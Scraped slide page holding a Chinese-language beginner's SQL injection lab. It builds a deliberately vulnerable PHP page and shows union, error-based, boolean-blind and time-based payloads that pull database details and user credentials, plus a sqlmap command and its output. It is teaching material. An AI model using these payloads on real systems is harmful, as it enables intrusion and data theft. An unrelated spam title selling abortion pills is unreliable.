Design For Accessibility: Getting it right from the start
Design For Accessibility: Getting it right from the startDesign For Accessibility: Getting it right from the start
Design For Accessibility: Getting it right from the start
 
Generative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPTGenerative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPT
 
Unit 4_Part 1 CSE2001 Exception Handling and Function Template and Class Temp...
Unit 4_Part 1 CSE2001 Exception Handling and Function Template and Class Temp...Unit 4_Part 1 CSE2001 Exception Handling and Function Template and Class Temp...
Unit 4_Part 1 CSE2001 Exception Handling and Function Template and Class Temp...
 
Kuwait City MTP kit ((+919101817206)) Buy Abortion Pills Kuwait
Kuwait City MTP kit ((+919101817206)) Buy Abortion Pills KuwaitKuwait City MTP kit ((+919101817206)) Buy Abortion Pills Kuwait
Kuwait City MTP kit ((+919101817206)) Buy Abortion Pills Kuwait
 
Thermal Engineering -unit - III & IV.ppt
Thermal Engineering -unit - III & IV.pptThermal Engineering -unit - III & IV.ppt
Thermal Engineering -unit - III & IV.ppt
 
GEAR TRAIN- BASIC CONCEPTS AND WORKING PRINCIPLE
GEAR TRAIN- BASIC CONCEPTS AND WORKING PRINCIPLEGEAR TRAIN- BASIC CONCEPTS AND WORKING PRINCIPLE
GEAR TRAIN- BASIC CONCEPTS AND WORKING PRINCIPLE
 
Orlando’s Arnold Palmer Hospital Layout Strategy-1.pptx
Orlando’s Arnold Palmer Hospital Layout Strategy-1.pptxOrlando’s Arnold Palmer Hospital Layout Strategy-1.pptx
Orlando’s Arnold Palmer Hospital Layout Strategy-1.pptx
 
HOA1&2 - Module 3 - PREHISTORCI ARCHITECTURE OF KERALA.pptx
HOA1&2 - Module 3 - PREHISTORCI ARCHITECTURE OF KERALA.pptxHOA1&2 - Module 3 - PREHISTORCI ARCHITECTURE OF KERALA.pptx
HOA1&2 - Module 3 - PREHISTORCI ARCHITECTURE OF KERALA.pptx
 
Online food ordering system project report.pdf
Online food ordering system project report.pdfOnline food ordering system project report.pdf
Online food ordering system project report.pdf
 
PE 459 LECTURE 2- natural gas basic concepts and properties
PE 459 LECTURE 2- natural gas basic concepts and propertiesPE 459 LECTURE 2- natural gas basic concepts and properties
PE 459 LECTURE 2- natural gas basic concepts and properties
 
A CASE STUDY ON CERAMIC INDUSTRY OF BANGLADESH.pptx
A CASE STUDY ON CERAMIC INDUSTRY OF BANGLADESH.pptxA CASE STUDY ON CERAMIC INDUSTRY OF BANGLADESH.pptx
A CASE STUDY ON CERAMIC INDUSTRY OF BANGLADESH.pptx
 
Thermal Engineering Unit - I & II . ppt
Thermal Engineering Unit - I & II . pptThermal Engineering Unit - I & II . ppt
Thermal Engineering Unit - I & II . ppt
 
"Lesotho Leaps Forward: A Chronicle of Transformative Developments"
"Lesotho Leaps Forward: A Chronicle of Transformative Developments""Lesotho Leaps Forward: A Chronicle of Transformative Developments"
"Lesotho Leaps Forward: A Chronicle of Transformative Developments"
 
1_Introduction + EAM Vocabulary + how to navigate in EAM.pdf
1_Introduction + EAM Vocabulary + how to navigate in EAM.pdf1_Introduction + EAM Vocabulary + how to navigate in EAM.pdf
1_Introduction + EAM Vocabulary + how to navigate in EAM.pdf
 
kiln thermal load.pptx kiln tgermal load
kiln thermal load.pptx kiln tgermal loadkiln thermal load.pptx kiln tgermal load
kiln thermal load.pptx kiln tgermal load
 
Standard vs Custom Battery Packs - Decoding the Power Play
Standard vs Custom Battery Packs - Decoding the Power PlayStandard vs Custom Battery Packs - Decoding the Power Play
Standard vs Custom Battery Packs - Decoding the Power Play
 

Sql injection 幼幼班

  • 2. Wiki 定義 • SQL攻擊(SQL injection),簡稱隱碼攻擊,是發⽣生 於應⽤用程式之資料庫層的安全漏洞。簡⽽而⾔言之,是在 輸⼊入的字串之中夾帶SQL指令,在設計不良的程式當 中忽略了檢查,那麼這些夾帶進去的指令就會被資料 庫伺服器誤認為是正常的SQL指令⽽而執⾏行,因此遭到 破壞或是⼊入侵。
  • 3. ⼀一個簡單的範例 • 登⼊入驗證的SQL查詢代碼 • strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');" • 惡意填⼊入 • userName = "1' OR '1'='1"; • passWord = "1' OR '1'='1"; • SQL查詢命令變成 • strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');" • strSQL = "SELECT * FROM users;" (result=true 無帳號密碼,亦可登⼊入網站)
  • 4. SQL Injection Lab • 實驗步驟 • 設定被攻擊系統 • Union Based Injection • Error Based Injection • Boolean Based Blind Injection • Time Based Blind Injection • 使⽤用 sqlmap 分析弱點
  • 6. 新增資料庫 # mysql -uroot -pspy123 test < test.mysql # mysql -uroot -pspy123 test -e "show tables" +----------------+ | Tables_in_test | +----------------+ | fruit | | user | +----------------+ # mysql -uroot -pspy123 test -e "select * from fruit" +----+--------+ | ID | Name | +----+--------+ | 1 | apple | | 2 | banana | | 3 | cherry | | 4 | date | +----+--------+ # mysql -uroot -pspy123 test -e "select * from user" +----+------+------+ | ID | Name | Pass | +----+------+------+ | 1 | aaa | 111 | | 2 | bbb | 222 | | 3 | ccc | 333 | +----+------+------+
  • 7. hackme.php (攻擊⺫⽬目標) <?php $id= $_GET["id"]; $link = mysql_connect('localhost', 'root', 'spy123'); if (!$link) die('Not connected : ' . mysql_error()); $db_selected = mysql_select_db('test', $link); if (!$db_selected) die ('Can't use foo : ' . mysql_error()); $db_query = "SELECT * FROM fruit WHERE ID='$id' LIMIT 0,1;"; echo $db_query . "<hr>"; $result = mysql_query($db_query); if (!$result) die('Invalid query: ' . mysql_error()); while ($row = mysql_fetch_assoc($result)) { echo "name: " . $row['Name'] . "<br>"; } mysql_free_result($result); ?>
  • 8. ⼩小試⾝身⼿手 • 正常查詢 (https://192.168.200.61/hackme.php?id=1) • Input: 1 • Query: SELECT * FROM Test WHERE ID='1' LIMIT 0,1; • Response: name: apple • 測試 input query 是否使⽤用單引號 (SELECT * FROM Test WHERE ID='1' LIMIT 0,1;) • input: 1 >> name: apple • input: 1' >> Invalid query: You have an error in your SQL syntax... • input: 1" >> name: apple • input: 1' or '1'='1 >> name: apple
  • 10. 技術描述 • 使⽤用 UNION 將另⼀一段 SELECT 指令加掛在正常輸⼊入 後⾯面,藉此窺探系統資訊。 • The attacker appends to the affected parameter a syntactically valid SQL statement starting with an UNION ALL SELECT.
  • 11. 推測表格欄位數⺫⽬目 • 原 SQL Query 指令 • $db_query = "SELECT * FROM fruit WHERE ID='$id' LIMIT 0,1;"; • SQL Injection 發現 fruit table 有兩個欄位 • $db_query = "SELECT * FROM fruit WHERE ID='1' union select 1, 2-- -LIMIT 0,1;"; 被註解掉
  • 12. 找出系統資訊 Target Input Response 資料庫名稱 -1' union select 1,database()-- - name: test 系統版本 -1' union select 1,version()-- - name: 5.5.33a-MariaDB 資料庫使⽤用者 -1' union select 1,user()-- - name: root@localhost SELECT * FROM fruit WHERE ID='-1' union select 1,version()-- -' LIMIT 0,1;
  • 13. 找出表格名稱 • Input • -1' union select 1,table_name from information_schema.tables where table_schema=database()--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' union select 1,table_name from information_schema.tables where table_schema=database()-- ' LIMIT 0,1; • Response • name: fruit • name: user
  • 14. 找出欄位名稱 • Input • -1' union Select 1,column_name from information_schema.columns where table_schema=database() and table_name='user'--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' union Select 1,column_name from information_schema.columns where table_schema=database() and table_name='user'-- ' LIMIT 0,1; • Response • name: ID • name: Name • name: Pass
  • 15. 找出表格資料 • Input • -1' union Select 1,concat(ID,", ",Name,", ",Pass) from user--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' union Select 1,concat(ID,", ",Name,", ",Pass) from user-- ' LIMIT 0,1; • Response • name: 1, aaa, 111 • name: 2, bbb, 222 • name: 3, ccc, 333
  • 17. 技術描述 • 傳遞不乾淨的輸⼊入引發資料庫錯誤,藉由產⽣生的錯誤 進⾏行窺探 • The attacker replaces or appends to the affected parameter a database-specific error message provoking statement and parses the HTTP response headers and body in search of DBMS error messages containing the injected pre-defined chain of characters and the subquery statement output within.
  • 18. 找出當前資料庫名稱 • Input • -1' and extractvalue(0x0a,concat(0x0a,(select database())))-- + • SQL Query • SELECT * FROM fruit WHERE ID='-1' and extractvalue(0x0a,concat(0x0a,(select database())))-- ' LIMIT 0,1; • Response • Invalid query: XPATH syntax error: ' test'
  • 19. 找出當前表格名稱 • Input • -1' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))-- ' LIMIT 0,1; • Response • Invalid query: XPATH syntax error: ' fruit'
  • 21. 技術描述 • 有時候系統沒有那麼多的漏洞,能讓你⽤用⽅方便的⽅方式得 到答案,只好跟被攻擊者玩 是/不是 (true/false) 的遊戲。 • 透過 substring(string_to_guess, N,1)=D 資料庫查詢指 令,猜測 string_to_guess 的第 N 個字元是否為 D (⼗十進 位表⽰示) • The attacker replaces or appends to the affected parameter in the HTTP request, a syntatically valid SQL statement string containing a SELECT sub-statement, or any other SQL statement whose the user want to retrieve the output.
  • 22.
  • 23. 猜測資料庫版本 • 猜測主版本為 4 • Input:1' and substring(version(),1,1)=4--+ • SQL Query:SELECT * FROM fruit WHERE ID='1' and substring(version(), 1,1)=4-- ' LIMIT 0,1; • Response:(沒輸出資料) • 猜測主版本為 5 • Input:1' and substring(version(),1,1)=5--+ • SQL Query: SELECT * FROM fruit WHERE ID='1' and substring(version(), 1,1)=5-- ' LIMIT 0,1; • Response:name: apple
  • 24. 猜測表格名稱 • Input • 1' and ascii(substring((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1), 1,1))>64--+ • SQL Query • SELECT * FROM fruit WHERE ID='1' and ascii(substring((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1))>64-- ' LIMIT 0,1; • Steps • >64 (有反應); >112 (無反應); >95 (有反應); >110 (無反應); >103 (無反應); 
 >100 (有反應); >102 (無反應); >101 (有反應); =102 (有反應) • 表格第⼀一個字: “f" (⼗十進位=102),重複以上步驟猜出表格名稱: "fruit"
  • 25. 猜測欄位名稱 • 猜 fruit table 第⼀一個欄位名稱的字⺟母 • 1' and ascii(substring((select concat(column_name) from information_schema.columns where table_name="fruit" limit 0,1),1,1))=73--+ • 1' and ascii(substring((select concat(column_name) from information_schema.columns where table_name="fruit" limit 0,1),2,1))=68--+ • fruit 表格第⼀一個欄位名稱: "ID" (⼗十進位=73, 68)
  • 26. 猜測欄位資料 • 表格(fruit) 第⼆二筆資料 欄位 (Name) 的值 • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),1,1))=98--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),2,1))=97--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),3,1))=110--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),4,1))=97--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),5,1))=110--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),6,1))=97--+ • 欄位值: “banana” (⼗十進位=98, 97, 100, 97, 110, 97)
  • 28. 技術描述 • 更糟的情形是⺫⽬目標連 是/不是 (true/false) 的遊戲都不 跟你玩,只能透過延遲時間的⽅方式窺探系統資訊。 • Time-based techniques are often used to achieve tests when there is no other way to retrieve information from the database server. This kind of attack injects a SQL segment which contains specific DBMS function or heavy query that generates a time delay.
  • 29. 猜出 SQL Query 的⽅方式 • 註解⽅方式: --+ • SQL Query: SELECT * FROM fruit WHERE ID=‘1’
  • 31. 為什麼要⽤用 sqlmap • 攻擊者不知道 SQL Query 的⻑⾧長相 • 猜測系統漏洞通常耗時費⼒力
  • 32. 指令 • # sqlmap -u "https://192.168.200.61/hackme.php? id=1" --force-ssl --dbms=mysql -p id • -u "https://192.168.200.61/..." ,要攻擊的URL • --force-ssl ,強制使⽤用 SSL/HTTPS • --dbms=mysql ,強制後端 DBMS 種類 • -p id ,要測試的參數
  • 33. Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 5529=5529 AND 'vZzG'='vZzG Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1' AND (SELECT 9346 FROM(SELECT COUNT(*),CONCAT(0x71626a6a71,(SELECT (ELT(9346=9346,1))),0x71766b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eHGd'='eHGd Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))VcYN) AND 'yLgG'='yLgG Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626a6a71,0x78576371715058656452616346686d506c666643427a52514775 456778504d50744e504951505a54,0x71766b7871)-- -
  • 35. Magic Quotes 被關閉了 • 防⽌止 user 端送到 server 端的資料,會被惡意內容攻擊。 • 當 magic_quotes_gpc=on 時,$_GET、$_POST、$_COOKIE 等 等從 user 端來的資料,如果含有單引號、雙引號、反斜線等內 容,會⾃自動被加⼀一條反斜線在前⾯面,把該字元跳脫掉。 • echo.php <?php echo $_GET["input"]; ?> • HTTP GET https://192.168.200.61/echo.php?input=hugo's secret magic_quotes_gpc Response On hugo's secret Off hugo's secret